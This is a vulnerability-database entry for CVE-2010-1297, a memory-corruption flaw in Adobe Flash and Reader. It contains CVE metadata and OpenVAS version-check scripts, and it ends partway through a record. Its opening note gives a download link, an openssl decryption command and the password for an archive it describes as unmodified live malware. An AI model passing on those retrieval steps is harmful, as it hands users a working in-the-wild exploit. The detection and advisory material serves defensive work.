Adobe Flash and Reader - 0day Exploit PoC (from the wild)
2014-07-01T00:00:00
ID SSV:68962 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
# Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/
# File is malicious! Taken from the wild! Beware!
# To decrypt the file:
# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar
# Password is "edb" without the quotes.
NOTE: This was taken out of live malware and was not modified. BEWARE.
By visiting the following link, you agree that you are responsible for any damages that occur.
http://www.exploit-db.com/sploits/adobe-0day-2010-1297.tar.enc
{"href": "https://www.seebug.org/vuldb/ssvid-68962", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Adobe Flash and Reader - 0day Exploit PoC (from the wild)", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-68962", "cvelist": ["CVE-2010-1297"], "description": "No description provided by source.", "viewCount": 4, "published": "2014-07-01T00:00:00", "sourceData": "\n # Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/\r\n\r\n# File is malicious! Taken from the wild! Beware!\r\n# To decrypt the file:\r\n# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar\r\n# Password is "edb" without the quotes.\r\n\r\nNOTE: This was taken out of live malware and was not modified. BEWARE.\r\n\r\nBy visiting the following link, you agree that you are responsible for any damages that occur.\r\n\r\nhttp://www.exploit-db.com/sploits/adobe-0day-2010-1297.tar.enc\r\n\r\n\r\n\n ", "id": "SSV:68962", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:56:10", "reporter": "Root", "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2017-11-19T14:56:10", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1297"]}, {"type": "openvas", "idList": ["OPENVAS:902200", "OPENVAS:850135", "OPENVAS:1361412562310801361", "OPENVAS:902194", "OPENVAS:1361412562310801360", "OPENVAS:1361412562310902200", "OPENVAS:801360", "OPENVAS:801361", "OPENVAS:67656", "OPENVAS:1361412562310850135"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24038", "SECURITYVULNS:VULN:10921", "SECURITYVULNS:DOC:24282", "SECURITYVULNS:DOC:24039", "SECURITYVULNS:DOC:24043", "SECURITYVULNS:DOC:25153"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:90664", "PACKETSTORM:90665", "PACKETSTORM:93394"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8E576C4816C791FE420A43AC52B86332", "EXPLOITPACK:4125F09B17C03F68D9E1171B95C97590"]}, {"type": "saint", "idList": ["SAINT:4087FA9BA2E83B1761565A4E280BC32F", "SAINT:770782F23BE978D80AAD6E9F9088C70A", "SAINT:77C0093237F1AF8B89C92BAD6DF70E05"]}, {"type": "exploitdb", "idList": ["EDB-ID:16687", "EDB-ID:16614", "EDB-ID:13787"]}, {"type": "canvas", "idList": ["FLASH_NEWFUNCTION"]}, {"type": "cert", "idList": ["VU:486225"]}, {"type": "seebug", "idList": ["SSV:19759", "SSV:71128", "SSV:87100"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_NEWFUNCTION", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_FLASHPLAYER_NEWFUNCTION"]}, {"type": "threatpost", "idList": ["THREATPOST:40512FCC86A3D41C18AC58E1B95FF55E", "THREATPOST:F7E082438478997F07E358DD1CB69C57"]}, {"type": "nessus", "idList": ["SUSE_11_1_ACROREAD-100708.NASL", "SUSE_11_2_ACROREAD-100706.NASL", "REDHAT-RHSA-2010-0503.NASL", "ADOBE_ACROBAT_APSB10-15.NASL", "SUSE_11_ACROREAD_JA-100702.NASL", "ADOBE_READER_APSB10-15.NASL", "SUSE_11_0_ACROREAD-100708.NASL", "SUSE_ACROREAD-7087.NASL", "SUSE_ACROREAD_JA-7086.NASL", "SUSE_11_ACROREAD-100702.NASL"]}, {"type": "suse", "idList": ["SUSE-SA:2010:024", "SUSE-SA:2010:029"]}, {"type": "redhat", "idList": ["RHSA-2010:0470", "RHSA-2010:0464", "RHSA-2010:0503"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "freebsd", "idList": ["144E524A-77EB-11DF-AE06-001B2134EF46"]}, {"type": "gentoo", "idList": ["GLSA-201101-09", "GLSA-201009-05"]}], "modified": "2017-11-19T14:56:10", "rev": 2}, "vulnersScore": 8.5}, "references": []}
{"cve": [{"lastseen": "2020-12-09T19:34:38", "description": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64; Adobe AIR before 2.0.2.12610; and Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted SWF content, related to authplay.dll and the ActionScript Virtual Machine 2 (AVM2) newfunction instruction, as exploited in the wild in June 2010.", "edition": 5, "cvss3": {}, "published": "2010-06-08T18:30:00", "title": "CVE-2010-1297", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1297"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:flash_player:9.0.152.0", "cpe:/a:adobe:flash_player:10.0.42.34", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:flash_player:9.0.31", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:flash_player:9.0.31.0", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:flash_player:10.0.45.2", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:flash_player:9.0.112.0", "cpe:/a:adobe:flash_player:9.0.20", "cpe:/a:adobe:flash_player:9.0.18d60", "cpe:/a:adobe:flash_player:9.0.16", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:flash_player:10.0.32.18", "cpe:/a:adobe:flash_player:9.0.124.0", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:flash_player:10.0.22.87", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:flash_player:10.0.12.36", "cpe:/a:adobe:flash_player:9.0.47.0", "cpe:/a:adobe:flash_player:9.0.151.0", "cpe:/a:adobe:flash_player:9.0.48.0", "cpe:/a:adobe:flash_player:9.0.115.0", "cpe:/a:adobe:flash_player:9.0.28.0", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:flash_player:9.0.28", "cpe:/a:adobe:flash_player:9.0.246.0", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:flash_player:10.0.15.3", "cpe:/a:adobe:flash_player:9.0.125.0", "cpe:/a:adobe:flash_player:9.0.20.0", "cpe:/a:adobe:flash_player:9.0.114.0", "cpe:/a:adobe:flash_player:9.0.262.0", "cpe:/a:adobe:flash_player:10.0.0.584", "cpe:/a:adobe:flash_player:10.0.12.10", "cpe:/a:adobe:flash_player:9.0.260.0", "cpe:/a:adobe:flash_player:9.0.45.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:flash_player:9.0.159.0"], "id": "CVE-2010-1297", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1297", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.0.0.584:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.260.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.159.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.262.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.112.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.42.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.22.87:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.18d60:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.114.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.246.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.32.18:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.36:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.45.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.152.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.45.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:40:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1297"], "description": "This host is installed with Adobe products and is prone to\n remote code execution vulnerability.", "modified": "2018-12-04T00:00:00", "published": "2010-06-15T00:00:00", "id": "OPENVAS:1361412562310801361", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801361", "type": "openvas", "title": "Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_prdts_code_exec_vuln_lin_jun10.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801361\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-15 06:05:27 +0200 (Tue, 15 Jun 2010)\");\n script_cve_id(\"CVE-2010-1297\");\n script_bugtraq_id(40586);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1349\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1348\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa10-01.html\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\", \"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader/Linux/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code by tricking a user into opening a specially crafted PDF file.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 9.x to 9.3.2\n\n Adobe Flash Player version 9.0.x to 9.0.262 and 10.x through 10.0.45.2\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a memory corruption error in the\n 'libauthplay.so.0.0.0' library and 'SWF' file when processing ActionScript\n Virtual Machine 2 (AVM2) 'newfunction' instructions within Flash content in a PDF document.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe products and is prone to\n remote code execution vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player 10.1.53.64 or 9.0.277.0 or later\n\n For Adobe Reader a patch was released by the Vendor, please see the references for more information.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\npVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(pVer)\n{\n # Adobe Flash Player version 9.0.0 to 9.0.262 and 10.x to 10.0.45.2\n if(version_in_range(version:pVer, test_version:\"9.0.0\", test_version2:\"9.0.262\") ||\n version_in_range(version:pVer, test_version:\"10.0\", test_version2:\"10.0.45.2\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\n# Adobe Reader\narVer = get_kb_item(\"Adobe/Reader/Linux/Version\");\nif(arVer)\n{\n if(version_in_range(version:arVer, test_version:\"9.0\", test_version2:\"9.3.2\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-02T15:55:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1297"], "description": "This host is installed with Adobe products and is prone to\n remote code execution vulnerability.", "modified": "2020-05-28T00:00:00", "published": "2010-06-15T00:00:00", "id": "OPENVAS:1361412562310801360", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801360", "type": "openvas", "title": "Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801360\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-06-15 06:05:27 +0200 (Tue, 15 Jun 2010)\");\n script_cve_id(\"CVE-2010-1297\");\n script_bugtraq_id(40586);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1349\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1348\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa10-01.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\", \"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code by tricking a user into opening a specially crafted PDF file.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader/Acrobat version 9.x to 9.3.2\n\n Adobe Flash Player version 9.0.x to 9.0.262 and 10.x to 10.0.45.2\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a memory corruption error in the 'authplay.dll'\n library and 'SWF' file when processing ActionScript Virtual Machine 2 (AVM2)\n 'newfunction' instructions within Flash content in a PDF document.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe products and is prone to\n remote code execution vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player 10.1.53.64 or 9.0.277.0 or later\n\n For Adobe Reader additional updates has been released which are described in the referenced advisories.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player\",\n \"cpe:/a:adobe:acrobat\",\n \"cpe:/a:adobe:acrobat_reader\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\ncpe = infos[\"cpe\"];\n\nif(cpe == \"cpe:/a:adobe:flash_player\") {\n if(version_in_range(version:vers, test_version:\"9.0.0\", test_version2:\"9.0.262\") ||\n version_in_range(version:vers, test_version:\"10.0\", test_version2:\"10.0.45.2\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"10.1.53.64 or 9.0.277.0\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n} else if(cpe == \"cpe:/a:adobe:acrobat\" || cpe == \"cpe:/a:adobe:acrobat_reader\") {\n if(version_in_range(version:vers, test_version:\"9.0\", test_version2:\"9.3.2\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"See references\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1297"], "description": "This host is installed with Adobe products and is prone to\nremote code execution vulnerability.", "modified": "2017-12-21T00:00:00", "published": "2010-06-15T00:00:00", "id": "OPENVAS:801360", "href": "http://plugins.openvas.org/nasl.php?oid=801360", "type": "openvas", "title": "Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_prdts_code_exec_vuln_win_jun10.nasl 8210 2017-12-21 10:26:31Z cfischer $\n#\n# Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"For Adobe Flash Player,\nUpdate to Adobe Flash Player 10.1.53.64 or 9.0.277.0 or later,\nFor updates refer to http://www.adobe.com/support/flashplayer/downloads.html\n\nFor Adobe Reader\nVendor has released a patch for the issue, refer below link,\nhttp://www.adobe.com/support/security/advisories/apsa10-01.html\nFor updates refer to http://www.adobe.com/\";\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute\narbitrary code by tricking a user into opening a specially crafted PDF file.\n\nImpact Level: System/Application\";\n\ntag_affected = \"Adobe Reader/Acrobat version 9.x to 9.3.2\n\nAdobe Flash Player version 9.0.x to 9.0.262 and 10.x to 10.0.45.2\";\n\ntag_insight = \"The flaw is due to a memory corruption error in the 'authplay.dll'\nlibrary and 'SWF' file when processing ActionScript Virtual Machine 2 (AVM2)\n'newfunction' instructions within Flash content in a PDF document.\";\n\ntag_summary = \"This host is installed with Adobe products and is prone to\nremote code execution vulnerability.\";\n\nif(description)\n{\n script_id(801360);\n script_version(\"$Revision: 8210 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 11:26:31 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-15 06:05:27 +0200 (Tue, 15 Jun 2010)\");\n script_cve_id(\"CVE-2010-1297\");\n script_bugtraq_id(40586);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Products Remote Code Execution Vulnerability - jun10 (Windows)\");\n\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1349\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1348\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/advisories/apsa10-01.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\", \"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:adobe:flash_player\";\nif(pVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n # Adobe Flash Player version 9.0.0 to 9.0.262 and 10.x to 10.0.45.2\n if(version_in_range(version:pVer, test_version:\"9.0.0\", test_version2:\"9.0.262\") ||\n version_in_range(version:pVer, test_version:\"10.0\", test_version2:\"10.0.45.2\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\nCPE = \"cpe:/a:adobe:acrobat\";\nif(acVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n # Grep for Adobe Acrobat version 9.0 to 9.3.2\n if(version_in_range(version:acVer, test_version:\"9.0\", test_version2:\"9.3.2\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\nif(arVer = get_app_version(cpe:CPE))\n{\n # Grep for Adobe Reader version 9.0 to 9.3.2\n if(version_in_range(version:arVer, test_version:\"9.0\", test_version2:\"9.3.2\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-14T10:48:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1297"], "description": "This host is installed with Adobe products and is prone to\nremote code execution vulnerability.", "modified": "2017-06-29T00:00:00", "published": "2010-06-15T00:00:00", "id": "OPENVAS:801361", "href": "http://plugins.openvas.org/nasl.php?oid=801361", "type": "openvas", "title": "Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_prdts_code_exec_vuln_lin_jun10.nasl 6476 2017-06-29 07:32:00Z cfischer $\n#\n# Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"For Adobe Flash Player,\nUpdate to Adobe Flash Player 10.1.53.64 or 9.0.277.0 or later\nhttp://www.adobe.com/support/flashplayer/downloads.html\n\nFor Adobe Reader\nVendor has released a patch for the issue, refer below link,\nhttp://www.adobe.com/support/security/advisories/apsa10-01.html\nFor updates refer to http://www.adobe.com/\";\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute\narbitrary code by tricking a user into opening a specially crafted PDF file.\n\nImpact Level: System/Application\";\n\ntag_affected = \"Adobe Reader version 9.x to 9.3.2\nAdobe Flash Player version 9.0.x to 9.0.262 and 10.x through 10.0.45.2\";\n\ntag_insight = \"The flaw is due to a memory corruption error in the\n'libauthplay.so.0.0.0' library and 'SWF' file when processing ActionScript\nVirtual Machine 2 (AVM2) 'newfunction' instructions within Flash content in a\nPDF document.\";\n\ntag_summary = \"This host is installed with Adobe products and is prone to\nremote code execution vulnerability.\";\n\nif(description)\n{\n script_id(801361);\n script_version(\"$Revision: 6476 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-06-29 09:32:00 +0200 (Thu, 29 Jun 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-15 06:05:27 +0200 (Tue, 15 Jun 2010)\");\n script_cve_id(\"CVE-2010-1297\");\n script_bugtraq_id(40586);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Products Remote Code Execution Vulnerability - jun10 (Linux)\");\n\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1349\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1348\");\n script_xref(name : 